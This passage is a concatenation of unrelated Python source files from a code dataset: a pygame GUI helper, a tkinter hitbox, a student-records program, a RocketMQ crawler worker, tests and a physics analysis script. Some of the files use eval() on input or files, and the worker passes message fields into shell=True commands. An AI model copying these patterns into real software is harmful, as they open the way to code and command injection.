max(self.Get(\"input_key_max\"), self.Get(\"input_button_max\"))):\r\n self.Get(\"input_key_tap\")[i] = self.Get(\"input_key_down\")[\r\n i] and not self.Get(\"input_key_old\")[i]\r\n if (self.Get(\"input_key_tap\")[i]):\r\n self.Get(\"input_key_tap_dict\").append(pygame.key.name(i))\r\n self.Get(\"input_key_old\")[i] = self.Get(\"input_key_down\")[i]\r\n if (i > min(i, self.Get(\"input_button_max\")-1)):\r\n continue\r\n self.Get(\"input_button_tap\")[i] = self.Get(\"input_button_down\")[\r\n i] and not self.Get(\"input_button_old\")[i]\r\n self.Get(\"input_button_up\")[i] = self.Get(\"input_button_old\")[\r\n i] and not self.Get(\"input_button_down\")[i]\r\n self.Get(\"input_button_old\")[i] = self.Get(\"input_button_down\")[i]\r\n self.Set(\"input_scroll_delta\", self.Get(\r\n \"input_scroll_pos\")-self.Get(\"input_scroll_pos_old\"))\r\n self.Set(\"input_scroll_pos_old\", self.Get(\"input_scroll_pos\"))\r\n self.Set(\"input_mouse_pos_old\", self.Get(\"input_mouse_pos\"))\r\n\r\n def SetBounds(self, bounds):\r\n self.Set(\"bounds\", bounds)\r\n s_x = self.Get(\"size\")[0] / (bounds[1]-bounds[0])\r\n s_y = self.Get(\"size\")[1] / (bounds[2]-bounds[3])\r\n o_x = (bounds[0]*self.Get(\"size\")[0]) / (bounds[0] - bounds[1])\r\n o_y = self.Get(\"size\")[\r\n 1] + ((bounds[2]*self.Get(\"size\")[1])/(bounds[3]-bounds[2]))\r\n self.Set(\"point_matrix\", np.array(\r\n [[s_x, 0, o_x], [0, s_y, o_y], [0, 0, 1]]))\r\n self.Set(\"dist_matrix\", np.array([[s_x, 0], [0, s_y]]))\r\n\r\n def IsInWindow(self, point):\r\n pos = self.Get(\"point_matrix\").dot(np.append(point, [1]))\r\n if (pos[0] < 0 or pos[0] > self.Get(\"size\")[0]):\r\n if (pos[1] < 0 or pos[1] > self.Get(\"size\")[1]):\r\n return True\r\n return False\r\n\r\n def DrawCircle(self, colour, center, radius, filled=True):\r\n pos = self.Get(\"point_matrix\").dot(np.append(center, [1]))\r\n size = self.Get(\"dist_matrix\").dot(np.array([radius, radius]))\r\n if (filled):\r\n pygame.gfxdraw.filled_ellipse(self.Get(\"display\"), int(pos[0]), int(\r\n pos[1]), int(abs(size[0])), int(abs(size[1])), colour)\r\n pygame.gfxdraw.aaellipse(self.Get(\"display\"), int(pos[0]), int(\r\n pos[1]), int(abs(size[0])), int(abs(size[1])), colour)\r\n\r\n def FilledRect(self, colour, center, size, is_numpy=True, dest=None):\r\n surf = self.Get(\"display\")\r\n if dest != None:\r\n surf = dest\r\n pos = center\r\n if (is_numpy):\r\n pos = self.Get(\"point_matrix\").dot(np.append(center, [1]))\r\n size = self.Get(\"dist_matrix\").dot(size)\r\n pygame.draw.rect(\r\n surf, colour, [pos[0]-size[0]/2.0, pos[1]-size[1]/2.0, size[0], size[1]])\r\n\r\n def DrawText(self, colour, pos, size, string, back_colour=None, dest=None, angle = 0.0):\r\n surf = self.Get(\"display\")\r\n if dest != None:\r\n surf = dest\r\n self.Set(\"font\", pygame.font.Font(\r\n pygame.font.get_default_font(), size))\r\n text = self.Get(\"font\").render(string, True, colour, back_colour)\r\n text = pygame.transform.rotate(text,angle)\r\n surf.blit(text, [pos[0], pos[1]])\r\n\r\n def Quit(self):\r\n pygame.display.quit()\r\n pygame.quit()\r\n self.Set(\"isClosing\", 1)\r\n","sub_path":"PyGUtil.py","file_name":"PyGUtil.py","file_ext":"py","file_size_in_byte":33334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"55178263","text":"\"\"\"\nA square hitbox for entities to detect collisions.\n\"\"\"\nimport tkinter as tk\nfrom random import randint\n\n\nclass Hitbox:\n def __init__(self, x, y, width, height):\n self.__width = abs(width)\n 
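# abs() keeps the stored dimensions positive so a negative size cannot invert the box\n        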
self.__height = abs(height)\n self.__x = x\n self.__y = y\n\n self.__canvas = None\n self.__id = None\n\n def collidesWith(self, hitbox):\n \"\"\"\n Checks if this instance of a hitbox collides with the one given as a parameter\n Instead of checking whether they collide, the function checks if they DON'T collide and\n returns a negated boolean instead. It's easier this way.\n :param hitbox: Hitbox object\n :return: True if it collides with the given hitbox\n \"\"\"\n x_doesnt_collide = self.__x + self.__width < hitbox.getX() if self.__x < hitbox.getX() \\\n else hitbox.getX() + hitbox.getWidth() < self.__x\n y_doesnt_collide = self.__y + self.__height < hitbox.getY() if self.__y < hitbox.getY() \\\n else hitbox.getY() + hitbox.getHeight() < self.__y\n\n return not x_doesnt_collide and not y_doesnt_collide\n\n def move(self, x=0, y=0):\n \"\"\"\n Moves the hitbox\n :param x: the amount of pixels to move the hitbox on the X axis\n :param y: the amount of pixels to move the hitbox on the Y axis\n \"\"\"\n self.__x += x\n self.__y += y\n\n if self.__id:\n self.__canvas.move(self.__id, x, y)\n\n # Setters\n\n def setX(self, x):\n self.__x = x\n\n def setY(self, y):\n self.__y = y\n\n def setWidth(self, width):\n self.__width = width\n\n def setHeight(self, height):\n self.__height = height\n\n # Getters\n\n def getX(self):\n return self.__x\n\n def getY(self):\n return self.__y\n\n def getWidth(self):\n return self.__width\n\n def getHeight(self):\n return self.__height\n\n # Debug\n\n def display(self, canvas: tk.Canvas):\n \"\"\"\n Displays the hitbox as a black square in the given canvas\n :param canvas: A Tkinter Canvas object\n \"\"\"\n if not self.__canvas:\n self.__canvas = canvas\n self.__id = canvas.create_polygon(self.__x, self.__y,\n self.__x + self.__width, self.__y,\n self.__x + self.__width, self.__y + self.__height,\n self.__x, self.__y + self.__height,\n fill=\"#222222\")\n\n def hide(self):\n \"\"\"\n Hides the hitbox if display has been called before\n \"\"\"\n if self.__id:\n self.__canvas.delete(self.__id)\n self.__canvas = None\n self.__id = None\n\n\nif __name__ == '__main__':\n \"\"\"Collision test\"\"\"\n root = tk.Tk()\n\n do_they_collide = tk.Label(root)\n do_they_collide.pack()\n\n canvas = tk.Canvas(root, width=500, height=500, bg=\"gray\")\n canvas.pack()\n\n X1, X2 = 150, 250\n Y1, Y2 = 150, 50\n WIDTH1, WIDTH2 = 200, 200\n HEIGHT1, HEIGHT2 = 100, 300\n\n hb1 = Hitbox(X1, Y1, WIDTH1, HEIGHT1)\n hb1.display(canvas)\n\n hb2 = Hitbox(X2, Y2, WIDTH2, HEIGHT2)\n hb2.display(canvas)\n\n do_they_collide[\"text\"] = str(hb1.collidesWith(hb2))\n \n root.mainloop()\n","sub_path":"objects/hitbox.py","file_name":"hitbox.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250103086","text":"a=eval(input())\nnum=len(a)\nmax1=-10000000\nif num==1:\n print(a[0])\nelse:\n for i in range(0,num):\n kk=a[i]\n for j in range(i+1,num):\n kk=kk+a[j]\n if kk>max1:\n max1=kk\n print(max1)","sub_path":"Code/CodeRecords/2621/47961/248463.py","file_name":"248463.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"494600649","text":"from tokenizer import parser\n# from decimal import Decimal as dcm\nimport csv\n__author__ = 'Zhenwei Wang, wangzw1@live.unc.edu, Onyen = wangzw1'\n\n# this is the main class to handle the sentiment labeling process\n# when a review is sent into the tokenizer, it first 
processes the text\n# for positive/negative scoring using SentiWordNet corpus.\n# after that the original label of the movie review is used for reference.\n\n\ndef sentimentlabel(initfile):\n procfile = open(initfile, encoding = \"ISO-8859-1\")\n reader = csv.DictReader(procfile, delimiter=',')\n rows = []\n working_file = open('4_class_imdb_pred.csv', 'w')\n working_file.write(\"sentence,label\\n\")\n for row in reader:\n rows.append(row)\n # for i in range(5):\n for i in range(len(rows)):\n result = parser(rows[i]['sentence'])\n if rows[i][\"label\"] == \"1\": # positive\n outcome = pos_identifier(result[0],result[1])\n elif rows[i][\"label\"] == \"0\": # negative\n outcome = neg_identifier(result[1],result[0])\n\n working_file.write('\"'+rows[i][\"sentence\"]+'\",'+outcome+'\\n')\n working_file.close()\n print(\"Save Done\")\n\n\ndef neg_identifier(inita,initb):\n if inita-initb<0.02:\n outcome = \"somewhat negative\"\n else: outcome = \"negative\"\n return outcome\n\n\ndef pos_identifier(inita,initb):\n if inita-initb<0.02:\n outcome = \"somewhat positive\"\n else: outcome = \"positive\"\n return outcome\n\nsentimentlabel(\"imdb_labelled.csv\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"8976078","text":"import threading\n\nc = 0\nSum = 10000\n\nlock = threading.Lock()\n\ndef myAdd():\n global c, Sum\n for i in range(1, Sum):\n # acquire the lock\n lock.acquire()\n c += 1\n # release the lock\n lock.release()\n\ndef myMinu():\n global c, Sum\n for i in range(1, Sum):\n lock.acquire()\n c -= 1\n lock.release()\n\n\nif __name__ == '__main__':\n print('Starting....%d' %c)\n\n # pass the function itself; calling it here would run it inline instead of in a thread\n t1 = threading.Thread(target=myAdd, args=())\n t2 = threading.Thread(target=myMinu, args=())\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n print('Done....%d' %c)","sub_path":"多线程/案例10.py","file_name":"案例10.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"649760440","text":"\"\"\"\nLeetCode 819. Most Common Word\nurl: https://leetcode.com/problems/most-common-word/\nwriter: Harim Kang\nLanguage: Python3\nDate: 2020.08.28\nStatus: Success, Runtime: 36 ms, Memory Usage: 14 MB\n\"\"\"\nimport re\nimport collections\n\n\nclass Solution:\n def mostCommonWord(self, paragraph, banned):\n word = [\n w\n for w in re.sub(r\"[^\\w]\", \" \", paragraph).lower().split()\n if w not in banned\n ]\n count = collections.Counter(word)\n answer = count.most_common(1)[0][0]\n\n return answer\n\n\nif __name__ == \"__main__\":\n paragraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\n banned = [\"hit\"]\n print(Solution().mostCommonWord(paragraph, banned))\n","sub_path":"leetcode/string_manipulation/most_common_word.py","file_name":"most_common_word.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"455562128","text":"# holds all of the students' information\nstuInfos = []\n\n# global variables\n#newName = \"\"\n#newSex = \"\"\n#newPhone = \"\"\n\n# print the function menu\ndef printMenu():\n print(\"=\"*30)\n print(\" Student Management System V1.0\")\n print(\"1. Add student info\")\n print(\"2. Delete student info\")\n print(\"3. Modify student info\")\n print(\"4. Search student info\")\n print(\"5. Show all student info\")\n print(\"6. Save data\")\n print(\"0. 
Exit system\")\n print(\"=\"*30)\n\n# get one student's information\n\ndef getInfo():\n\n# global newName\n# global newSex\n# global newPhone\n\n #3.1 prompt for and read the student's name\n newName = input(\"Please enter the new student's name:\")\n\n #3.2 prompt for and read the student's sex\n newSex = input(\"Please enter the new student's sex (male/female):\")\n\n #3.3 prompt for and read the student's phone number\n newPhone = input(\"Please enter the new student's phone number:\")\n\n # bundle the data into a list and return it\n #return [newName, newSex, newPhone]\n # bundle the data into a tuple and return it\n #return (newName, newSex, newPhone)\n return {\"name\":newName, \"sex\":newSex, \"phone\":newPhone}\n \n\n\n# add a new student's information\ndef addStuInfo():\n \n result = getInfo() #[\"aaaa\",\"male\",\"10086\"]\n\n newInfo = {}\n # newInfo['name'] = result[0]\n # newInfo['sex'] = result[1]\n # newInfo['phone'] = result[2]\n newInfo['name'] = result[\"name\"]\n newInfo['sex'] = result[\"sex\"]\n newInfo['phone'] = result[\"phone\"]\n\n stuInfos.append(newInfo)\n \n# modify one student's information\ndef modifyStuInfo():\n #3.1 prompt for the index of the student to modify\n stuId = int(input(\"Please enter the index of the student to modify:\"))\n\n result = getInfo()\n\n stuInfos[stuId-1]['name'] = result['name']\n stuInfos[stuId-1]['sex'] = result['sex']\n stuInfos[stuId-1]['phone'] = result['phone']\n\n\n# save all current student information to a file\ndef save2file():\n\n f = open(\"backup.data\",\"w\")\n\n #[{},{},{}]\n f.write(str(stuInfos))\n\n\n f.close()\n\n\n# restore saved data\ndef recoverData():\n global stuInfos\n f = open(\"backup.data\")\n content = f.read()\n stuInfos = eval(content)\n #print(stuInfos)\n f.close()\n\n\ndef main():\n\n # restore the previously saved data\n recoverData()\n\n\n print(stuInfos)\n\n\n\n while True:\n #1. print the function menu\n printMenu()\n\n #2. read the chosen function\n key = input(\"Please enter the number of the function:\")\n\n #3. act on the user's choice\n if key==\"1\":\n # add student info\n addStuInfo()\n\n elif key == '3':\n # modify student info\n modifyStuInfo()\n\n elif key == '5':\n #print(stuInfos)\n print(\"=\"*30)\n print(\"The students' information is as follows:\")\n print(\"=\"*30)\n\n print(\"No. Name Sex Phone\")\n i = 1\n for tempInfo in stuInfos:\n print(\"%d %s %s %s\"%(i, tempInfo['name'], tempInfo['sex'], tempInfo['phone'] ))\n i+=1\n elif key=='6':\n # save data to the file\n save2file()\n\n\n\n# call the main function\nmain()\n","sub_path":"文件/10-学生管理系统-4-文件.py","file_name":"10-学生管理系统-4-文件.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"322507247","text":"from ScoutSpyder.rocket import init_push_consumer\nfrom ScoutSpyder.utils.logging import initialise_logging\nfrom os import environ\nfrom rocketmq.client import ConsumeStatus\nfrom time import sleep\nimport argparse\nimport json\nimport signal\nimport subprocess\n\nLOGGER = initialise_logging('ScoutSpyder.rocket')\nTERMINATED = False\n\ndef read_arguments():\n parser = argparse.ArgumentParser(description='ScoutSpyder RocketMQ Worker')\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '-s', '--single', action='store_true', default=False,\n help='Only listen for single crawl events'\n )\n group.add_argument(\n '-b', '--batch', action='store_true', default=False,\n help='Only listen for batch crawl events'\n )\n return parser.parse_args()\n\ndef signal_handler(signal, frame):\n global TERMINATED\n LOGGER.info('Termination signal received...')\n TERMINATED = True\n\ndef setup_signal_handler():\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\ndef start_crawler(message):\n body = json.loads(message.body)\n type_ = body.get('type') or 'manual'\n crawl_id = body.get('crawl_id')\n duration = body.get('duration')\n environments = body.get('environments') or []\n activated_crawlers = body.get('activatedCrawlers') or []\n env_vars = environ.copy()\n for env in 
environments:\n env_vars.update( { env.get('name'): env.get('value') } )\n \n if activated_crawlers:\n activated_crawlers = ', '.join(activated_crawlers)\n subprocess.Popen(f'python main.py -id {crawl_id} -d {duration} -t {type_} -c \"{activated_crawlers}\"', start_new_session=True, env=env_vars, shell=True)\n else:\n subprocess.Popen(f'python main.py -id {crawl_id} -d {duration} -t {type_}', start_new_session=True, env=env_vars, shell=True)\n return ConsumeStatus.CONSUME_SUCCESS\n\ndef start_single_crawler(message):\n body = json.loads(message.body)\n article_id = body.get('article_id')\n subprocess.Popen(f'python main_single.py -i {article_id}', start_new_session=True, env=environ, shell=True)\n return ConsumeStatus.CONSUME_SUCCESS\n\n# PushConsumer subscribe function memoization causes\n# issues with have different callback functions\ndef start_callback(message):\n tag = message.tags.decode()\n if tag == 'crawler.internal.cmd.start':\n return start_crawler(message)\n elif tag == 'crawler_single.cmd.start':\n return start_single_crawler(message)\n return ConsumeStatus.CONSUME_SUCCESS\n\ndef main():\n args = read_arguments()\n LOGGER.info('Starting worker process...')\n\n if args.single or args.batch:\n if args.single:\n consumer = init_push_consumer('crawler-single')\n consumer.subscribe('crawler_single', start_callback, 'crawler_single.cmd.start')\n LOGGER.info('Listening for single crawl events only...')\n else:\n consumer = init_push_consumer('crawler-batch')\n consumer.subscribe('crawler', start_callback, 'crawler.internal.cmd.start')\n LOGGER.info('Listening for batch crawl events only...')\n else:\n consumer = init_push_consumer('crawler')\n consumer.subscribe('crawler', start_callback, 'crawler.internal.cmd.start')\n consumer.subscribe('crawler_single', start_callback, 'crawler_single.cmd.start')\n LOGGER.info('Listening for all crawl events...')\n\n LOGGER.info('Starting consumption loop...')\n consumer.start()\n while not TERMINATED:\n sleep(15)\n LOGGER.info('Terminating...')\n consumer.shutdown()\n\nif __name__ == '__main__':\n setup_signal_handler()\n main()","sub_path":"Backend/main_rocket.py","file_name":"main_rocket.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"315571749","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom pytest import raises\n\n\ndef test_non_ascii_bytes_fail_without_encoding(harness):\n raises(UnicodeDecodeError, harness.simple, (\"\"\"\n [------------------]\n text = u'א'\n [------------------]\n %(text)s\n \"\"\", 'utf8'))\n\ndef test_non_ascii_bytes_work_with_encoding(harness):\n expected = 'א'.encode('utf8')\n actual = harness.simple((\"\"\"\n # encoding=utf8\n [------------------]\n text = u'א'\n [------------------]\n %(text)s\n \"\"\", 'utf8')).body.strip()\n assert actual == expected\n\ndef test_the_exec_machinery_handles_two_encoding_lines_properly(harness):\n expected = 'א'.encode('utf8')\n actual = harness.simple((\"\"\"\\\n # encoding=utf8\n # encoding=ascii\n [------------------]\n text = u'א'\n [------------------]\n %(text)s\n \"\"\", 'utf8')).body.strip()\n assert actual == expected\n","sub_path":"tests/test_unicode.py","file_name":"test_unicode.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
+{"seq_id":"417834202","text":"#!/usr/local/bin/python3\n'''\nTests the MultiPeakTrack Analysis using some Summer 2015 data.\n\nRun this inside an interactive shell:\nipython --pylab\nrun session_20160615_Test_MultiPeakAnalysis_Vars_forLuis.py\n'''\n\n###############################################################################\n# Import Libraries\n\nimport KatydidHDF5IO\nimport P8RunParamsDB\nimport P8MiscAnalysis as ana\nimport P8Plotters\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\nimport os\nfrom scipy.stats import norm\nimport sys\n\n\n\n###############################################################################\n# Select which dataset to load\nflag_dataset_nb = 1\n\n#if flag_dataset_nb == 1:\n# run_name = '20150811T0040_BotCoil1000mA_TopCoil1000mA_CF1065MHz' # 32 keV dataset Summer run\n # corresponds to run_id = 222\nrun_id = 294\n\n###############################################################################\n# Plot options\nflag_save_fig = False\nflag_compare_MPA_vars = True\nflag_show_tcut = True\nflag_study_sidebands = True\nflag_look_at_sidebands = True\nflag_normalize = True\nflag_show_uncut=True\nflag_apply_cut_t=True\nflag_Luis = True\nt_range_margins = [-0.1,0.5];\nxmargins_ehist = [-0.300,+0.030]\nebins_w = 0.001/5\nhisttype1 = 'step'\nlw1 = 2\n\nsavefig_path = 'figs_20160614'\n\n\n###############################################################################\n# Analysis Parameters\ntlen_thresh_ms = 8.9\nnb_fit_points = 30\n\n\n###############################################################################\n# Initialize analysis\n\n\n# Load data from HDF5 file\nrun_params = P8RunParamsDB.RunParams(run_id)\nP8RunParamsDB.AnalysisSpecificParams(run_params);\ndata = KatydidHDF5IO.ConcatedEventHDF5ToDict(run_params['final_hdf5_fullname'])\n\n# Set the magnetic field calibration manually for now\n# -> this should be stored in the database eventually\n# Note: This is the custom calibration for the bathtup trap high stats data set from summer 2015 \n# For the harmonic trap, the calibration is B_magnet = 0.9583 T and b_coil = 0.0042 T/A.\nif (run_params['peak_e_keV']==30.48) & (run_params['run_id']==8):\n run_params['b_avg_total_T'] = 0.95843 - (8.6e-3 * 0.004)\nif (run_params['peak_e_keV']==30.48) & (run_params['run_id']>100):\n run_params['b_avg_total_T'] = 0.95843 - (8.6e-3 * 0.000)\nif run_params['peak_e_keV']==32:\n run_params['b_avg_total_T'] = 0.95843 - (8.6e-3 * 0.001)\nif run_params['peak_e_keV']==17.83:\n run_params['b_avg_total_T'] = 0.9583 - (8.1e-3 * 0.100/2.000)\n#if run_params['peak_e_keV']==17.83:\n# run_params['b_avg_total_T'] = 0.8945\n\n# Convert Frequency Energy\nana.Freq2EnergyData(data, run_params)\n# Calculate Livetime\nana.CalculateLivetime(data)\n\n# Energy bins for histograms\nif (run_params['peak_e_keV'] == 30.48) | (run_params['peak_e_keV'] == 30.43):\n ebins_edges = np.arange(29,31,ebins_w)\nif run_params['peak_e_keV'] == 32:\n ebins_edges = np.arange(20,40,ebins_w)\nif run_params['peak_e_keV'] == 17.83:\n ebins_edges = np.arange(16,20,ebins_w)\nebins_centers = (ebins_edges[:-1] + ebins_edges[1:]) / 2\n\n# Miscellaneous\nordinal = lambda n: \"%d%s\" % (n,\"tsnrhtdd\"[(n/10%10!=1)*(n%10<4)*n%10::4])\n\n###############################################################################\n# Prepare filename for figures\nif not os.path.exists(savefig_path):\n os.makedirs(savefig_path)\n\nfigname1 = os.path.join(os.path.abspath(savefig_path),('K_MPAnalysis_v1_runid%06d' % 
run_params['run_id']))\nif flag_show_uncut:\n figname1+='_all'\nif flag_apply_cut_t:\n figname1+='_tcut'\nif not flag_normalize:\n figname1+='_cts'\n\n\n###############################################################################\n# Create Cuts that will be applied to the data\n\ncut_good = np.ones(np.size(data['candidates']['StartTimeInAcq']), dtype=bool)\n\n# Define Track StartTime Cut\nt_range = run_params['pretrigger_time']*1e3 + np.array(t_range_margins)\ncut_t = (data['candidates']['StartTimeInAcq']*1e3>=t_range[0]) & (data['candidates']['StartTimeInAcq']*1e3<=t_range[1])\nif flag_apply_cut_t:\n cut_good = (cut_good) & (cut_t)\n\nana.MultiPeakAnalysisAdditionalVars(data,run_params)\n\n\n\n###############################################################################\n###############################################################################\n###############################################################################\n\n\n# Plots\n\n\n# Global definitions\nfbins_min = data['metadata']['minimum_frequency'][0]/1e6\nfbins_max = data['metadata']['maximum_frequency'][0]/1e6\nfbins_w = 1/2\nfbins_MHz = np.arange(fbins_min,fbins_max+fbins_w,fbins_w)\n\n\n###############################################################################\n# Compare the Multi-Peak Analysis Cuts\nif flag_compare_MPA_vars:\n plt.figure(10)\n plt.clf()\n max_counts_in_fbins = 0\n\n xdata = data['candidates']['StartFrequency']/1e6+fbins_min\n if True:\n label_str = \"data['candidates']['StartFrequency']\"\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if True:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if True:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByInput']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0 & MultiPeakTracks_OrderByInput=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if False:\n cut_tracks = (data['candidate_tracks']['MultiPeakTracks_EventFirstTrack']==True)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'MultiPeakTracks_EventFirstTrack=True'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str,linestyle='--')\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if True:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByTime']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0 & MultiPeakTracks_OrderByTime=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str,linestyle='--')\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n 
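    # each hard-coded True/False literal in this block is a manual toggle selecting which track-cut variant gets histogrammed\n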
if False:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByFreq']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0 & MultiPeakTracks_OrderByFreq=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str,linestyle='--')\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n\n plt.title(\"Frequency Histogram - %d Events, %0.01f sec livetime\" % (len(data['candidates']['StartFrequency']),data['metadata']['livetime']))\n plt.xlabel(\"Track Frequency [MHz]\")\n plt.ylabel(\"Counts\")\n plt.legend(loc='upper right')\n plt.xlim(fbins_min, fbins_max)\n plt.ylim(0, round(max_counts_in_fbins/50)*50)\n plt.grid(True)\n plt.ticklabel_format(useOffset=False)\n if flag_save_fig:\n plt.gcf().set_size_inches(15,5)\n figname2 = figname1+'_CompareMPAVars'\n plt.savefig(figname2+'.pdf',format='pdf',pad_inches=0.1)\n plt.show()\n\n\n###############################################################################\n\nif flag_show_tcut:\n plt.figure(20)\n plt.clf()\n max_counts_in_fbins = 0\n\n xdata = data['candidate_tracks']['StartFrequency']/1e6+fbins_min\n cut_track_0 = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByTime']==0)\n cut_good = cut_track_0\n if flag_show_uncut:\n label_str = 'all'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata[cut_good],fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if flag_apply_cut_t:\n cut_t = (data['candidate_tracks']['StartTimeInAcq']*1e3>=t_range[0]) & (data['candidate_tracks']['StartTimeInAcq']*1e3<=t_range[1])\n cut_good = cut_good & cut_t\n label_str = 't = %0.1f - %0.1f ms' % (t_range[0],t_range[1])\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata[cut_good],fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n if True:\n # Display stats about the time cut\n\n # First, find peak, and select only events within a frequecy range around the peak\n f_range_1_margins_MHz = np.array([-5,+35])\n f_range_2_margins_MHz = np.array([-1,+1])\n fbins_centers = (fbins_edges[:-1] + fbins_edges[1:]) / 2\n f_max_counts_MHz = fbins_centers[np.argmax(counts_in_fbins)]\n f_range_1_MHz = f_max_counts_MHz+f_range_1_margins_MHz\n f_range_2_MHz = f_max_counts_MHz+f_range_2_margins_MHz\n cut_f_range_1 = (xdata>f_range_1_MHz[0]) & (xdataf_range_2_MHz[0]) & (xdata=t_range[0]) & (data['candidate_tracks']['StartTimeInAcq']*1e3<=t_range[1])\n\n # Results\n results = {}\n results['mu'] = np.zeros((max_nb_tracks,max_nb_tracks))\n results['sigma'] = np.zeros_like(results['mu'])\n results['FWHM'] = np.zeros_like(results['mu'])\n\n\n for nb_tracks in np.arange(1,max_nb_tracks_user+1):\n if nb_tracks==1:\n fbins_w = 1/5\n if nb_tracks==2:\n fbins_w = 1/2\n if nb_tracks==3:\n fbins_w = 1/2\n fbins_MHz = np.arange(fbins_min,fbins_max+fbins_w,fbins_w)\n cut_nb_tracks = (data['candidate_tracks']['MultiPeakTracks_Total']==nb_tracks)\n print('nb_tracks: '+str(nb_tracks))\n max_counts_in_fbins = 0\n for track_n in range(nb_tracks):\n cut_track_n = data['candidate_tracks']['MultiPeakTracks_OrderByFreq']==track_n\n cut_seq = data['candidate_tracks']['EventSequenceID']==0\n cut_good = cut_t & cut_seq & cut_nb_tracks & 
cut_track_n;\n xpoints = nb_tracks*np.ones(sum(cut_track_n))+0.1*np.random.randn(sum(cut_track_n))\n tracks_freq = data['candidate_tracks']['StartFrequency'][cut_good]/1e6+fbins_min\n print('track_n: %d (%d tracks, mean=%0.1f)' % (track_n,sum(cut_good),np.mean(tracks_freq)))\n if flag_MPT_show_points:\n plt.figure(30)\n plt.plot(xpoints,tracks_freq,'.',color=colorlist[track_n])\n if flag_MPT_show_hists:\n plt.figure(40)\n plt.subplot(nb_colors,1,nb_tracks)\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(tracks_freq,fbins_MHz,color=colorlist[track_n],histtype=histtype1)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n fbins_centers = (fbins_edges[:-1] + fbins_edges[1:]) / 2\n if flag_MPT_apply_fit:\n # Use maximum bin as a first guess\n coeff0 = [np.max(counts_in_fbins),fbins_centers[np.argmax(counts_in_fbins)],fbins_w*3]\n # Fit the Peak\n coeff, var_matrix = optimize.curve_fit(ana.gauss, fbins_centers, counts_in_fbins,coeff0)\n ax=plt.axis()\n xx = np.arange(ax[0],ax[1],fbins_w)\n gauss_fit_y = ana.gauss(xx, *coeff)\n mu_MHz = coeff[1]\n 